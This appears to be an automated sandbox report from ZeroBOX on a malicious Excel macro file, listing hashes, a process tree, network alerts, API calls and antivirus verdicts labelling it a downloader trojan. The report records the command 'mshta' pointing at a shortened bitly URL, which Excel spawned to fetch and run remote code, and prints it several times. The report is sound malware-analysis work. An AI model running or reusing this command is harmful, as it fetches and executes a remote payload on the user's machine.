Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Oct. 27, 2021, 10:13 p.m.	Oct. 27, 2021, 10:16 p.m.

Size	35.5KB
Type	Microsoft Excel 2007+
MD5	`b1de71a7369b8398d18708df20890588`
SHA256	`83faecbef924ffbcce0c8939e5b9b4c453699df1cbbebaf11bdb43e8fa42d63e`
CRC32	`775F1CC1`
ssdeep	`768:snpoHrkdP32KMgh4p352TRd4i+oufgh8MUpk6TkVQiW:snOHrOPGKbh4X2TDz+ouIGMUpk64Oj`
Yara	None matched

EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office15\EXCEL.EXE" C:\Users\test22\AppData\Local\Temp\1.xls
2496
- mshta.exe mshta https://www.bitly.com/kddjkodwkwdokdwi
  3068

Name	Response	Post-Analysis Lookup
www.bitly.com	A 67.199.248.15 A 67.199.248.14 CNAME bitly.com	67.199.248.15

IP Address	Status	Action
164.124.101.2	Active	Moloch
67.199.248.15	Active	Moloch

Flow	SID	Signature	Category
TCP 192.168.56.103:49173 -> 67.199.248.15:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49172 -> 67.199.248.15:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

No Suricata TLS

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 27, 2021, 10:14 p.m.		1	1	0

Time & API	Arguments	Status
NtProtectVirtualMemory Oct. 27, 2021, 10:13 p.m.	process_identifier: 2496 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6c032000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 27, 2021, 10:14 p.m.	process_identifier: 2496 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6bb7e000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 27, 2021, 10:14 p.m.	process_identifier: 2496 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0676a000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 27, 2021, 10:14 p.m.	process_identifier: 2496 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0676a000 process_handle: 0xffffffff	1

file	C:\Users\test22\AppData\Local\Temp\~$1.xls

Time & API	Arguments	Status	Return	Repeated
NtCreateFile Oct. 27, 2021, 10:13 p.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x00000474 filepath: C:\Users\test22\AppData\Local\Temp\~$1.xls desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES\|DELETE\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$1.xls create_options: 4198496 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT\|FILE_DELETE_ON_CLOSE) status_info: 2 (FILE_CREATED) share_access: 1 (FILE_SHARE_READ)	1	0	0

cmdline

mshta https://www.bitly.com/kddjkodwkwdokdwi

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Oct. 27, 2021, 10:13 p.m.	process_identifier: 2496 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef70000 process_handle: 0xffffffff	1	0	0

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA Oct. 27, 2021, 10:14 p.m.	key_handle: 0x000002b4 regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) value: 0 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	1	0	0

parent_process

excel.exe

martian_process

mshta https://www.bitly.com/kddjkodwkwdokdwi

Lionic	Trojan.MSOffice.SLoad.a!c
Elastic	malicious (high confidence)
MicroWorld-eScan	Trojan.GenericKD.37870613
McAfee	RDN/Generic Downloader.x
Cyren	X97M/Downldr
Symantec	CL.Downloader!gen87
ESET-NOD32	a variant of Generik.GCDOHAC
Avast	SNH:Script [Dropper]
Kaspersky	UDS:DangerousObject.Multi.Generic
BitDefender	Trojan.GenericKD.37870613
NANO-Antivirus	Trojan.Ole2.Vbs-heuristic.druvzi
Tencent	Mac.Trojan.Macrov.Pfte
Ad-Aware	Trojan.GenericKD.37870613
McAfee-GW-Edition	BehavesLike.Downloader.nc
FireEye	Trojan.GenericKD.37870613
Emsisoft	Trojan.GenericKD.37870613 (B)
Ikarus	Win32.SuspectCrc
GData	Macro.Trojan.Agent.IZNZ5A
Avira	HEUR/Macro.Downloader.MRKI.Gen
Microsoft	TrojanDownloader:O97M/Obfuse.PLM!MTB
ZoneAlarm	HEUR:Trojan-Downloader.MSOffice.SLoad.gen
Cynet	Malicious (score: 99)
MAX	malware (ai score=89)
Fortinet	VBA/Dloader.MRKI!tr
AVG	SNH:Script [Dropper]

1.xls